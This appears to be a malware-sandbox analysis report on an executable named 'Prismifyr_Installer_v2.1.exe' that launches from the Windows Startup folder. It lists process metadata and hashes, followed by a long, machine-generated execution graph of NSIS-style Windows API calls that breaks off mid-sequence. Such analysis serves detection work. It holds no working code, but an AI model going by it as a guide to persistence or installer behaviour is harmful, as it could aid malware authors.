                                                                                                                                                                                                                        Imagebase:0x7ff70fdc0000
                                                                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                        Start time:06:03:22
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff6fc6a0000
                                                                                                                                                                                                                        File size:186'389'504 bytes
                                                                                                                                                                                                                        MD5 hash:F90856B824B429A51D390C25F21C9683
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:27.1%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:20.2%
                                                                                                                                                                                                                          Total number of Nodes:1333
                                                                                                                                                                                                                          Total number of Limit Nodes:35
                                                                                                                                                                                                                          execution_graph 2912 401941 2913 401943 2912->2913 2918 402c41 2913->2918 2919 402c4d 2918->2919 2960 4062dc 2919->2960 2922 401948 2924 4059cc 2922->2924 3002 405c97 2924->3002 2927 4059f4 DeleteFileW 2957 401951 2927->2957 2928 405a0b 2929 405b2b 2928->2929 3016 4062ba lstrcpynW 2928->3016 2929->2957 3045 4065fd FindFirstFileW 2929->3045 2931 405a31 2932 405a44 2931->2932 2933 405a37 lstrcatW 2931->2933 3018 405bdb lstrlenW 2932->3018 2934 405a4a 2933->2934 2937 405a5a lstrcatW 2934->2937 2939 405a65 lstrlenW FindFirstFileW 2934->2939 2937->2939 2939->2929 2949 405a87 2939->2949 2942 405984 5 API calls 2945 405b66 2942->2945 2944 405b0e FindNextFileW 2946 405b24 FindClose 2944->2946 2944->2949 2947 405b80 2945->2947 2948 405b6a 2945->2948 2946->2929 2951 405322 24 API calls 2947->2951 2952 405322 24 API calls 2948->2952 2948->2957 2949->2944 2953 4059cc 60 API calls 2949->2953 2955 405322 24 API calls 2949->2955 3017 4062ba lstrcpynW 2949->3017 3022 405984 2949->3022 3030 405322 2949->3030 3041 406080 MoveFileExW 2949->3041 2951->2957 2954 405b77 2952->2954 2953->2949 2956 406080 36 API calls 2954->2956 2955->2944 2956->2957 2973 4062e9 2960->2973 2961 406534 2962 402c6e 2961->2962 2993 4062ba lstrcpynW 2961->2993 2962->2922 2977 40654e 2962->2977 2964 406502 lstrlenW 2964->2973 2965 4062dc 10 API calls 2965->2964 2968 406417 GetSystemDirectoryW 2968->2973 2970 40642a GetWindowsDirectoryW 2970->2973 2971 40654e 5 API calls 2971->2973 2972 4064a5 lstrcatW 2972->2973 2973->2961 2973->2964 2973->2965 2973->2968 2973->2970 2973->2971 2973->2972 2974 40645e SHGetSpecialFolderLocation 2973->2974 2975 4062dc 10 API calls 2973->2975 2986 406188 2973->2986 2991 406201 wsprintfW 2973->2991 2992 4062ba lstrcpynW 2973->2992 2974->2973 2976 406476 SHGetPathFromIDListW CoTaskMemFree 2974->2976 2975->2973 2976->2973 2980 40655b 2977->2980 2978 4065d1 2979 4065d6 CharPrevW 2978->2979 2983 4065f7 2978->2983 2979->2978 2980->2978 2981 4065c4 CharNextW 2980->2981 2984 4065b0 CharNextW 2980->2984 2985 4065bf CharNextW 2980->2985 2998 405bbc 2980->2998 2981->2978 2981->2980 2983->2922 2984->2980 2985->2981 2994 406127 2986->2994 2989 4061ec 2989->2973 2990 4061bc RegQueryValueExW RegCloseKey 2990->2989 2991->2973 2992->2973 2993->2962 2995 406136 2994->2995 2996 40613a 2995->2996 2997 40613f RegOpenKeyExW 2995->2997 2996->2989 2996->2990 2997->2996 2999 405bc2 2998->2999 3000 405bd8 2999->3000 3001 405bc9 CharNextW 2999->3001 3000->2980 3001->2999 3051 4062ba lstrcpynW 3002->3051 3004 405ca8 3052 405c3a CharNextW CharNextW 3004->3052 3007 4059ec 3007->2927 3007->2928 3008 40654e 5 API calls 3011 405cbe 3008->3011 3009 405cef lstrlenW 3010 405cfa 3009->3010 3009->3011 3012 405b8f 3 API calls 3010->3012 3011->3007 3011->3009 3013 4065fd 2 API calls 3011->3013 3015 405bdb 2 API calls 3011->3015 3014 405cff GetFileAttributesW 3012->3014 3013->3011 3014->3007 3015->3009 3016->2931 3017->2949 3019 405be9 3018->3019 3020 405bfb 3019->3020 3021 405bef CharPrevW 3019->3021 3020->2934 3021->3019 3021->3020 3058 405d8b GetFileAttributesW 3022->3058 3025 4059b1 3025->2949 3026 4059a7 DeleteFileW 3028 4059ad 3026->3028 3027 40599f RemoveDirectoryW 3027->3028 3028->3025 3029 4059bd SetFileAttributesW 3028->3029 3029->3025 3031 40533d 3030->3031 3040 4053df 3030->3040 3032 405359 lstrlenW 3031->3032 3033 4062dc 17 API calls 3031->3033 3034 405382 3032->3034 3035 405367 lstrlenW 3032->3035 3033->3032 3037 405395 3034->3037 3038 405388 SetWindowTextW 3034->3038 3036 405379 lstrcatW 3035->3036 3035->3040 3036->3034 3039 40539b SendMessageW SendMessageW SendMessageW 3037->3039 3037->3040 3038->3037 3039->3040 3040->2949 3042 4060a1 3041->3042 3043 406094 3041->3043 3042->2949 3061 405f06 3043->3061 3046 406613 FindClose 3045->3046 3047 405b50 3045->3047 3046->3047 3047->2957 3048 405b8f lstrlenW CharPrevW 3047->3048 3049 405b5a 3048->3049 3050 405bab lstrcatW 3048->3050 3049->2942 3050->3049 3051->3004 3053 405c57 3052->3053 3056 405c69 3052->3056 3055 405c64 CharNextW 3053->3055 3053->3056 3054 405c8d 3054->3007 3054->3008 3055->3054 3056->3054 3057 405bbc CharNextW 3056->3057 3057->3056 3059 405990 3058->3059 3060 405d9d SetFileAttributesW 3058->3060 3059->3025 3059->3026 3059->3027 3060->3059 3062 405f36 3061->3062 3063 405f5c GetShortPathNameW 3061->3063 3088 405db0 GetFileAttributesW CreateFileW 3062->3088 3065 405f71 3063->3065 3066 40607b 3063->3066 3065->3066 3067 405f79 wsprintfA 3065->3067 3066->3042 3069 4062dc 17 API calls 3067->3069 3068 405f40 CloseHandle GetShortPathNameW 3068->3066 3070 405f54 3068->3070 3071 405fa1 3069->3071 3070->3063 3070->3066 3089 405db0 GetFileAttributesW CreateFileW 3071->3089 3073 405fae 3073->3066 3074 405fbd GetFileSize GlobalAlloc 3073->3074 3075 406074 CloseHandle 3074->3075 3076 405fdf 3074->3076 3075->3066 3090 405e33 ReadFile 3076->3090 3081 406012 3083 405d15 4 API calls 3081->3083 3082 405ffe lstrcpyA 3084 406020 3082->3084 3083->3084 3085 406057 SetFilePointer 3084->3085 3097 405e62 WriteFile 3085->3097 3088->3068 3089->3073 3091 405e51 3090->3091 3091->3075 3092 405d15 lstrlenA 3091->3092 3093 405d56 lstrlenA 3092->3093 3094 405d2f lstrcmpiA 3093->3094 3095 405d5e 3093->3095 3094->3095 3096 405d4d CharNextA 3094->3096 3095->3081 3095->3082 3096->3093 3098 405e80 GlobalFree 3097->3098 3098->3075 3099 4015c1 3100 402c41 17 API calls 3099->3100 3101 4015c8 3100->3101 3102 405c3a 4 API calls 3101->3102 3114 4015d1 3102->3114 3103 401631 3105 401663 3103->3105 3106 401636 3103->3106 3104 405bbc CharNextW 3104->3114 3108 401423 24 API calls 3105->3108 3126 401423 3106->3126 3116 40165b 3108->3116 3113 40164a SetCurrentDirectoryW 3113->3116 3114->3103 3114->3104 3115 401617 GetFileAttributesW 3114->3115 3118 40588b 3114->3118 3121 4057f1 CreateDirectoryW 3114->3121 3130 40586e CreateDirectoryW 3114->3130 3115->3114 3133 406694 GetModuleHandleA 3118->3133 3122 405842 GetLastError 3121->3122 3123 40583e 3121->3123 3122->3123 3124 405851 SetFileSecurityW 3122->3124 3123->3114 3124->3123 3125 405867 GetLastError 3124->3125 3125->3123 3127 405322 24 API calls 3126->3127 3128 401431 3127->3128 3129 4062ba lstrcpynW 3128->3129 3129->3113 3131 405882 GetLastError 3130->3131 3132 40587e 3130->3132 3131->3132 3132->3114 3134 4066b0 3133->3134 3135 4066ba GetProcAddress 3133->3135 3139 406624 GetSystemDirectoryW 3134->3139 3137 405892 3135->3137 3137->3114 3138 4066b6 3138->3135 3138->3137 3140 406646 wsprintfW LoadLibraryExW 3139->3140 3140->3138 3310 401e49 3311 402c1f 17 API calls 3310->3311 3312 401e4f 3311->3312 3313 402c1f 17 API calls 3312->3313 3314 401e5b 3313->3314 3315 401e72 EnableWindow 3314->3315 3316 401e67 ShowWindow 3314->3316 3317 402ac5 3315->3317 3316->3317 3772 40264a 3773 402c1f 17 API calls 3772->3773 3777 402659 3773->3777 3774 4026a3 ReadFile 3774->3777 3784 402796 3774->3784 3775 405e33 ReadFile 3775->3777 3777->3774 3777->3775 3778 4026e3 MultiByteToWideChar 3777->3778 3779 402798 3777->3779 3781 402709 SetFilePointer MultiByteToWideChar 3777->3781 3782 4027a9 3777->3782 3777->3784 3785 405e91 SetFilePointer 3777->3785 3778->3777 3794 406201 wsprintfW 3779->3794 3781->3777 3783 4027ca SetFilePointer 3782->3783 3782->3784 3783->3784 3786 405ead 3785->3786 3787 405ec5 3785->3787 3788 405e33 ReadFile 3786->3788 3787->3777 3789 405eb9 3788->3789 3789->3787 3790 405ef6 SetFilePointer 3789->3790 3791 405ece SetFilePointer 3789->3791 3790->3787 3791->3790 3792 405ed9 3791->3792 3793 405e62 WriteFile 3792->3793 3793->3787 3794->3784 3798 4016cc 3799 402c41 17 API calls 3798->3799 3800 4016d2 GetFullPathNameW 3799->3800 3801 4016ec 3800->3801 3807 40170e 3800->3807 3804 4065fd 2 API calls 3801->3804 3801->3807 3802 401723 GetShortPathNameW 3803 402ac5 3802->3803 3805 4016fe 3804->3805 3805->3807 3808 4062ba lstrcpynW 3805->3808 3807->3802 3807->3803 3808->3807 3809 40234e 3810 402c41 17 API calls 3809->3810 3811 40235d 3810->3811 3812 402c41 17 API calls 3811->3812 3813 402366 3812->3813 3814 402c41 17 API calls 3813->3814 3815 402370 GetPrivateProfileStringW 3814->3815 3598 4038d0 3599 4038e8 3598->3599 3600 4038da CloseHandle 3598->3600 3605 403915 3599->3605 3600->3599 3603 4059cc 67 API calls 3604 4038f9 3603->3604 3606 403923 3605->3606 3607 4038ed 3606->3607 3608 403928 FreeLibrary GlobalFree 3606->3608 3607->3603 3608->3607 3608->3608 3816 401b53 3817 402c41 17 API calls 3816->3817 3818 401b5a 3817->3818 3819 402c1f 17 API calls 3818->3819 3820 401b63 wsprintfW 3819->3820 3821 402ac5 3820->3821 3822 401956 3823 402c41 17 API calls 3822->3823 3824 40195d lstrlenW 3823->3824 3825 402592 3824->3825 3826 4014d7 3827 402c1f 17 API calls 3826->3827 3828 4014dd Sleep 3827->3828 3830 402ac5 3828->3830 3655 403d58 3656 403d70 3655->3656 3657 403eab 3655->3657 3656->3657 3658 403d7c 3656->3658 3659 403efc 3657->3659 3660 403ebc GetDlgItem GetDlgItem 3657->3660 3662 403d87 SetWindowPos 3658->3662 3663 403d9a 3658->3663 3661 403f56 3659->3661 3669 401389 2 API calls 3659->3669 3664 404231 18 API calls 3660->3664 3665 40427d SendMessageW 3661->3665 3686 403ea6 3661->3686 3662->3663 3666 403db7 3663->3666 3667 403d9f ShowWindow 3663->3667 3668 403ee6 KiUserCallbackDispatcher 3664->3668 3698 403f68 3665->3698 3670 403dd9 3666->3670 3671 403dbf DestroyWindow 3666->3671 3667->3666 3672 40140b 2 API calls 3668->3672 3673 403f2e 3669->3673 3674 403dde SetWindowLongW 3670->3674 3675 403def 3670->3675 3725 4041ba 3671->3725 3672->3659 3673->3661 3678 403f32 SendMessageW 3673->3678 3674->3686 3676 403e98 3675->3676 3677 403dfb GetDlgItem 3675->3677 3683 404298 8 API calls 3676->3683 3681 403e2b 3677->3681 3682 403e0e SendMessageW IsWindowEnabled 3677->3682 3678->3686 3679 40140b 2 API calls 3679->3698 3680 4041bc DestroyWindow EndDialog 3680->3725 3685 403e30 3681->3685 3688 403e38 3681->3688 3690 403e7f SendMessageW 3681->3690 3691 403e4b 3681->3691 3682->3681 3682->3686 3683->3686 3684 4041eb ShowWindow 3684->3686 3692 40420a SendMessageW 3685->3692 3687 4062dc 17 API calls 3687->3698 3688->3685 3688->3690 3689 404231 18 API calls 3689->3698 3690->3676 3694 403e53 3691->3694 3695 403e68 3691->3695 3693 403e66 3692->3693 3693->3676 3697 40140b 2 API calls 3694->3697 3696 40140b 2 API calls 3695->3696 3699 403e6f 3696->3699 3697->3685 3698->3679 3698->3680 3698->3686 3698->3687 3698->3689 3700 404231 18 API calls 3698->3700 3716 4040fc DestroyWindow 3698->3716 3699->3676 3699->3685 3701 403fe3 GetDlgItem 3700->3701 3702 404000 ShowWindow KiUserCallbackDispatcher 3701->3702 3703 403ff8 3701->3703 3726 404253 KiUserCallbackDispatcher 3702->3726 3703->3702 3705 40402a EnableWindow 3710 40403e 3705->3710 3706 404043 GetSystemMenu EnableMenuItem SendMessageW 3707 404073 SendMessageW 3706->3707 3706->3710 3707->3710 3709 403d39 18 API calls 3709->3710 3710->3706 3710->3709 3727 404266 SendMessageW 3710->3727 3728 4062ba lstrcpynW 3710->3728 3712 4040a2 lstrlenW 3713 4062dc 17 API calls 3712->3713 3714 4040b8 SetWindowTextW 3713->3714 3715 401389 2 API calls 3714->3715 3715->3698 3717 404116 CreateDialogParamW 3716->3717 3716->3725 3718 404149 3717->3718 3717->3725 3719 404231 18 API calls 3718->3719 3720 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3719->3720 3721 401389 2 API calls 3720->3721 3722 40419a 3721->3722 3722->3686 3723 4041a2 ShowWindow 3722->3723 3724 40427d SendMessageW 3723->3724 3724->3725 3725->3684 3725->3686 3726->3705 3727->3710 3728->3712 3831 401f58 3832 402c41 17 API calls 3831->3832 3833 401f5f 3832->3833 3834 4065fd 2 API calls 3833->3834 3835 401f65 3834->3835 3837 401f76 3835->3837 3838 406201 wsprintfW 3835->3838 3838->3837 3729 402259 3730 402c41 17 API calls 3729->3730 3731 40225f 3730->3731 3732 402c41 17 API calls 3731->3732 3733 402268 3732->3733 3734 402c41 17 API calls 3733->3734 3735 402271 3734->3735 3736 4065fd 2 API calls 3735->3736 3737 40227a 3736->3737 3738 40228b lstrlenW lstrlenW 3737->3738 3739 40227e 3737->3739 3741 405322 24 API calls 3738->3741 3740 405322 24 API calls 3739->3740 3743 402286 3739->3743 3740->3743 3742 4022c9 SHFileOperationW 3741->3742 3742->3739 3742->3743 3839 4046db 3840 404711 3839->3840 3841 4046eb 3839->3841 3843 404298 8 API calls 3840->3843 3842 404231 18 API calls 3841->3842 3844 4046f8 SetDlgItemTextW 3842->3844 3845 40471d 3843->3845 3844->3840 3744 40175c 3745 402c41 17 API calls 3744->3745 3746 401763 3745->3746 3747 405ddf 2 API calls 3746->3747 3748 40176a 3747->3748 3749 405ddf 2 API calls 3748->3749 3749->3748 3846 401d5d GetDlgItem GetClientRect 3847 402c41 17 API calls 3846->3847 3848 401d8f LoadImageW SendMessageW 3847->3848 3849 402ac5 3848->3849 3850 401dad DeleteObject 3848->3850 3850->3849 3851 4022dd 3852 4022e4 3851->3852 3853 4022f7 3851->3853 3854 4062dc 17 API calls 3852->3854 3855 4022f1 3854->3855 3856 405920 MessageBoxIndirectW 3855->3856 3856->3853 3142 405461 3143 405482 GetDlgItem GetDlgItem GetDlgItem 3142->3143 3144 40560b 3142->3144 3188 404266 SendMessageW 3143->3188 3146 405614 GetDlgItem CreateThread CloseHandle 3144->3146 3147 40563c 3144->3147 3146->3147 3211 4053f5 OleInitialize 3146->3211 3149 405667 3147->3149 3150 405653 ShowWindow ShowWindow 3147->3150 3151 40568c 3147->3151 3148 4054f2 3155 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3148->3155 3152 405673 3149->3152 3153 4056c7 3149->3153 3193 404266 SendMessageW 3150->3193 3197 404298 3151->3197 3157 4056a1 ShowWindow 3152->3157 3158 40567b 3152->3158 3153->3151 3163 4056d5 SendMessageW 3153->3163 3161 405567 3155->3161 3162 40554b SendMessageW SendMessageW 3155->3162 3159 4056c1 3157->3159 3160 4056b3 3157->3160 3194 40420a 3158->3194 3166 40420a SendMessageW 3159->3166 3165 405322 24 API calls 3160->3165 3167 40557a 3161->3167 3168 40556c SendMessageW 3161->3168 3162->3161 3169 40569a 3163->3169 3170 4056ee CreatePopupMenu 3163->3170 3165->3159 3166->3153 3189 404231 3167->3189 3168->3167 3171 4062dc 17 API calls 3170->3171 3173 4056fe AppendMenuW 3171->3173 3175 40571b GetWindowRect 3173->3175 3176 40572e TrackPopupMenu 3173->3176 3174 40558a 3177 405593 ShowWindow 3174->3177 3178 4055c7 GetDlgItem SendMessageW 3174->3178 3175->3176 3176->3169 3180 405749 3176->3180 3181 4055b6 3177->3181 3182 4055a9 ShowWindow 3177->3182 3178->3169 3179 4055ee SendMessageW SendMessageW 3178->3179 3179->3169 3183 405765 SendMessageW 3180->3183 3192 404266 SendMessageW 3181->3192 3182->3181 3183->3183 3184 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3183->3184 3186 4057a7 SendMessageW 3184->3186 3186->3186 3187 4057d0 GlobalUnlock SetClipboardData CloseClipboard 3186->3187 3187->3169 3188->3148 3190 4062dc 17 API calls 3189->3190 3191 40423c SetDlgItemTextW 3190->3191 3191->3174 3192->3178 3193->3149 3195 404211 3194->3195 3196 404217 SendMessageW 3194->3196 3195->3196 3196->3151 3198 40435b 3197->3198 3199 4042b0 GetWindowLongW 3197->3199 3198->3169 3199->3198 3200 4042c5 3199->3200 3200->3198 3201 4042f2 GetSysColor 3200->3201 3202 4042f5 3200->3202 3201->3202 3203 404305 SetBkMode 3202->3203 3204 4042fb SetTextColor 3202->3204 3205 404323 3203->3205 3206 40431d GetSysColor 3203->3206 3204->3203 3207 404334 3205->3207 3208 40432a SetBkColor 3205->3208 3206->3205 3207->3198 3209 404347 DeleteObject 3207->3209 3210 40434e CreateBrushIndirect 3207->3210 3208->3207 3209->3210 3210->3198 3218 40427d 3211->3218 3213 405418 3217 40543f 3213->3217 3221 401389 3213->3221 3214 40427d SendMessageW 3215 405451 CoUninitialize 3214->3215 3217->3214 3219 404295 3218->3219 3220 404286 SendMessageW 3218->3220 3219->3213 3220->3219 3223 401390 3221->3223 3222 4013fe 3222->3213 3223->3222 3224 4013cb MulDiv SendMessageW 3223->3224 3224->3223 3857 401563 3858 402a6b 3857->3858 3861 406201 wsprintfW 3858->3861 3860 402a70 3861->3860 3225 4023e4 3226 402c41 17 API calls 3225->3226 3227 4023f6 3226->3227 3228 402c41 17 API calls 3227->3228 3229 402400 3228->3229 3242 402cd1 3229->3242 3232 402ac5 3233 402438 3234 402444 3233->3234 3246 402c1f 3233->3246 3237 402463 RegSetValueExW 3234->3237 3249 403116 3234->3249 3235 402c41 17 API calls 3238 40242e lstrlenW 3235->3238 3240 402479 RegCloseKey 3237->3240 3238->3233 3240->3232 3243 402cec 3242->3243 3269 406155 3243->3269 3247 4062dc 17 API calls 3246->3247 3248 402c34 3247->3248 3248->3234 3250 40312f 3249->3250 3251 40315d 3250->3251 3276 403347 SetFilePointer 3250->3276 3273 403331 3251->3273 3255 4032ca 3257 40330c 3255->3257 3262 4032ce 3255->3262 3256 40317a GetTickCount 3258 4032b4 3256->3258 3265 4031c9 3256->3265 3260 403331 ReadFile 3257->3260 3258->3237 3259 403331 ReadFile 3259->3265 3260->3258 3261 403331 ReadFile 3261->3262 3262->3258 3262->3261 3263 405e62 WriteFile 3262->3263 3263->3262 3264 40321f GetTickCount 3264->3265 3265->3258 3265->3259 3265->3264 3266 403244 MulDiv wsprintfW 3265->3266 3268 405e62 WriteFile 3265->3268 3267 405322 24 API calls 3266->3267 3267->3265 3268->3265 3270 406164 3269->3270 3271 402410 3270->3271 3272 40616f RegCreateKeyExW 3270->3272 3271->3232 3271->3233 3271->3235 3272->3271 3274 405e33 ReadFile 3273->3274 3275 403168 3274->3275 3275->3255 3275->3256 3275->3258 3276->3251 3862 404367 lstrcpynW lstrlenW 3863 401968 3864 402c1f 17 API calls 3863->3864 3865 40196f 3864->3865 3866 402c1f 17 API calls 3865->3866 3867 40197c 3866->3867 3868 402c41 17 API calls 3867->3868 3869 401993 lstrlenW 3868->3869 3870 4019a4 3869->3870 3871 4019e5 3870->3871 3875 4062ba lstrcpynW 3870->3875 3873 4019d5 3873->3871 3874 4019da lstrlenW 3873->3874 3874->3871 3875->3873 3876 402868 3877 402c41 17 API calls 3876->3877 3878 40286f FindFirstFileW 3877->3878 3879 402882 3878->3879 3880 402897 3878->3880 3884 406201 wsprintfW 3880->3884 3882 4028a0 3885 4062ba lstrcpynW 3882->3885 3884->3882 3885->3879 3886 403968 3887 403973 3886->3887 3888 403977 3887->3888 3889 40397a GlobalAlloc 3887->3889 3889->3888 3890 40166a 3891 402c41 17 API calls 3890->3891 3892 401670 3891->3892 3893 4065fd 2 API calls 3892->3893 3894 401676 3893->3894 3318 40176f 3319 402c41 17 API calls 3318->3319 3320 401776 3319->3320 3321 401796 3320->3321 3322 40179e 3320->3322 3357 4062ba lstrcpynW 3321->3357 3358 4062ba lstrcpynW 3322->3358 3325 40179c 3329 40654e 5 API calls 3325->3329 3326 4017a9 3327 405b8f 3 API calls 3326->3327 3328 4017af lstrcatW 3327->3328 3328->3325 3347 4017bb 3329->3347 3330 4065fd 2 API calls 3330->3347 3331 405d8b 2 API calls 3331->3347 3333 4017cd CompareFileTime 3333->3347 3334 40188d 3336 405322 24 API calls 3334->3336 3335 401864 3337 405322 24 API calls 3335->3337 3346 401879 3335->3346 3338 401897 3336->3338 3337->3346 3339 403116 31 API calls 3338->3339 3341 4018aa 3339->3341 3340 4062ba lstrcpynW 3340->3347 3342 4018be SetFileTime 3341->3342 3344 4018d0 CloseHandle 3341->3344 3342->3344 3343 4062dc 17 API calls 3343->3347 3345 4018e1 3344->3345 3344->3346 3348 4018e6 3345->3348 3349 4018f9 3345->3349 3347->3330 3347->3331 3347->3333 3347->3334 3347->3335 3347->3340 3347->3343 3356 405db0 GetFileAttributesW CreateFileW 3347->3356 3359 405920 3347->3359 3350 4062dc 17 API calls 3348->3350 3351 4062dc 17 API calls 3349->3351 3352 4018ee lstrcatW 3350->3352 3353 401901 3351->3353 3352->3353 3355 405920 MessageBoxIndirectW 3353->3355 3355->3346 3356->3347 3357->3325 3358->3326 3360 405935 3359->3360 3361 405981 3360->3361 3362 405949 MessageBoxIndirectW 3360->3362 3361->3347 3362->3361 3895 4027ef 3896 4027f6 3895->3896 3899 402a70 3895->3899 3897 402c1f 17 API calls 3896->3897 3898 4027fd 3897->3898 3900 40280c SetFilePointer 3898->3900 3900->3899 3901 40281c 3900->3901 3903 406201 wsprintfW 3901->3903 3903->3899 3904 4043f0 3905 404408 3904->3905 3909 404522 3904->3909 3910 404231 18 API calls 3905->3910 3906 40458c 3907 404656 3906->3907 3908 404596 GetDlgItem 3906->3908 3915 404298 8 API calls 3907->3915 3911 4045b0 3908->3911 3912 404617 3908->3912 3909->3906 3909->3907 3913 40455d GetDlgItem SendMessageW 3909->3913 3914 40446f 3910->3914 3911->3912 3918 4045d6 SendMessageW LoadCursorW SetCursor 3911->3918 3912->3907 3919 404629 3912->3919 3937 404253 KiUserCallbackDispatcher 3913->3937 3917 404231 18 API calls 3914->3917 3925 404651 3915->3925 3921 40447c CheckDlgButton 3917->3921 3941 40469f 3918->3941 3923 40463f 3919->3923 3924 40462f SendMessageW 3919->3924 3920 404587 3938 40467b 3920->3938 3935 404253 KiUserCallbackDispatcher 3921->3935 3923->3925 3926 404645 SendMessageW 3923->3926 3924->3923 3926->3925 3930 40449a GetDlgItem 3936 404266 SendMessageW 3930->3936 3932 4044b0 SendMessageW 3933 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3932->3933 3934 4044cd GetSysColor 3932->3934 3933->3925 3934->3933 3935->3930 3936->3932 3937->3920 3939 404689 3938->3939 3940 40468e SendMessageW 3938->3940 3939->3940 3940->3906 3944 4058e6 ShellExecuteExW 3941->3944 3943 404605 LoadCursorW SetCursor 3943->3912 3944->3943 3945 401a72 3946 402c1f 17 API calls 3945->3946 3947 401a7b 3946->3947 3948 402c1f 17 API calls 3947->3948 3949 401a20 3948->3949 3950 401573 3951 401583 ShowWindow 3950->3951 3952 40158c 3950->3952 3951->3952 3953 40159a ShowWindow 3952->3953 3954 402ac5 3952->3954 3953->3954 3955 402df3 3956 402e05 SetTimer 3955->3956 3957 402e1e 3955->3957 3956->3957 3958 402e73 3957->3958 3959 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3957->3959 3959->3958 3960 401cf3 3961 402c1f 17 API calls 3960->3961 3962 401cf9 IsWindow 3961->3962 3963 401a20 3962->3963 3964 4014f5 SetForegroundWindow 3965 402ac5 3964->3965 3966 402576 3967 402c41 17 API calls 3966->3967 3968 40257d 3967->3968 3971 405db0 GetFileAttributesW CreateFileW 3968->3971 3970 402589 3971->3970 3632 401b77 3633 401bc8 3632->3633 3635 401b84 3632->3635 3636 401bf2 GlobalAlloc 3633->3636 3637 401bcd 3633->3637 3634 4022e4 3639 4062dc 17 API calls 3634->3639 3635->3634 3641 401b9b 3635->3641 3638 4062dc 17 API calls 3636->3638 3647 401c0d 3637->3647 3651 4062ba lstrcpynW 3637->3651 3638->3647 3640 4022f1 3639->3640 3645 405920 MessageBoxIndirectW 3640->3645 3652 4062ba lstrcpynW 3641->3652 3644 401bdf GlobalFree 3644->3647 3645->3647 3646 401baa 3653 4062ba lstrcpynW 3646->3653 3649 401bb9 3654 4062ba lstrcpynW 3649->3654 3651->3644 3652->3646 3653->3649 3654->3647 3972 404a78 3973 404aa4 3972->3973 3974 404a88 3972->3974 3976 404ad7 3973->3976 3977 404aaa SHGetPathFromIDListW 3973->3977 3983 405904 GetDlgItemTextW 3974->3983 3979 404ac1 SendMessageW 3977->3979 3980 404aba 3977->3980 3978 404a95 SendMessageW 3978->3973 3979->3976 3982 40140b 2 API calls 3980->3982 3982->3979 3983->3978 3984 4024f8 3985 402c81 17 API calls 3984->3985 3986 402502 3985->3986 3987 402c1f 17 API calls 3986->3987 3988 40250b 3987->3988 3989 402533 RegEnumValueW 3988->3989 3990 402527 RegEnumKeyW 3988->3990 3992 40288b 3988->3992 3991 402548 RegCloseKey 3989->3991 3990->3991 3991->3992 3994 40167b 3995 402c41 17 API calls 3994->3995 3996 401682 3995->3996 3997 402c41 17 API calls 3996->3997 3998 40168b 3997->3998 3999 402c41 17 API calls 3998->3999 4000 401694 MoveFileW 3999->4000 4001 4016a7 4000->4001 4007 4016a0 4000->4007 4003 4065fd 2 API calls 4001->4003 4005 402250 4001->4005 4002 401423 24 API calls 4002->4005 4004 4016b6 4003->4004 4004->4005 4006 406080 36 API calls 4004->4006 4006->4007 4007->4002 4008 401e7d 4009 402c41 17 API calls 4008->4009 4010 401e83 4009->4010 4011 402c41 17 API calls 4010->4011 4012 401e8c 4011->4012 4013 402c41 17 API calls 4012->4013 4014 401e95 4013->4014 4015 402c41 17 API calls 4014->4015 4016 401e9e 4015->4016 4017 401423 24 API calls 4016->4017 4018 401ea5 4017->4018 4025 4058e6 ShellExecuteExW 4018->4025 4020 401ee7 4023 40288b 4020->4023 4026 406745 WaitForSingleObject 4020->4026 4022 401f01 CloseHandle 4022->4023 4025->4020 4027 40675f 4026->4027 4028 406771 GetExitCodeProcess 4027->4028 4029 4066d0 2 API calls 4027->4029 4028->4022 4030 406766 WaitForSingleObject 4029->4030 4030->4027 4031 4019ff 4032 402c41 17 API calls 4031->4032 4033 401a06 4032->4033 4034 402c41 17 API calls 4033->4034 4035 401a0f 4034->4035 4036 401a16 lstrcmpiW 4035->4036 4037 401a28 lstrcmpW 4035->4037 4038 401a1c 4036->4038 4037->4038 4039 401000 4040 401037 BeginPaint GetClientRect 4039->4040 4041 40100c DefWindowProcW 4039->4041 4043 4010f3 4040->4043 4044 401179 4041->4044 4045 401073 CreateBrushIndirect FillRect DeleteObject 4043->4045 4046 4010fc 4043->4046 4045->4043 4047 401102 CreateFontIndirectW 4046->4047 4048 401167 EndPaint 4046->4048 4047->4048 4049 401112 6 API calls 4047->4049 4048->4044 4049->4048 4050 401503 4051 40150b 4050->4051 4053 40151e 4050->4053 4052 402c1f 17 API calls 4051->4052 4052->4053 3277 402104 3278 402c41 17 API calls 3277->3278 3279 40210b 3278->3279 3280 402c41 17 API calls 3279->3280 3281 402115 3280->3281 3282 402c41 17 API calls 3281->3282 3283 40211f 3282->3283 3284 402c41 17 API calls 3283->3284 3285 402129 3284->3285 3286 402c41 17 API calls 3285->3286 3288 402133 3286->3288 3287 402172 CoCreateInstance 3292 402191 3287->3292 3288->3287 3289 402c41 17 API calls 3288->3289 3289->3287 3290 401423 24 API calls 3291 402250 3290->3291 3292->3290 3292->3291 3293 402484 3304 402c81 3293->3304 3296 402c41 17 API calls 3297 402497 3296->3297 3298 4024a2 RegQueryValueExW 3297->3298 3299 40288b 3297->3299 3300 4024c2 3298->3300 3301 4024c8 